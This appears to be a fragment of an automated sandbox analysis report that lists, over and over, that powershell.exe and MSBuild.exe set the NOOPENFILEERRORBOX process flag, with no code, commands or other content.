                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
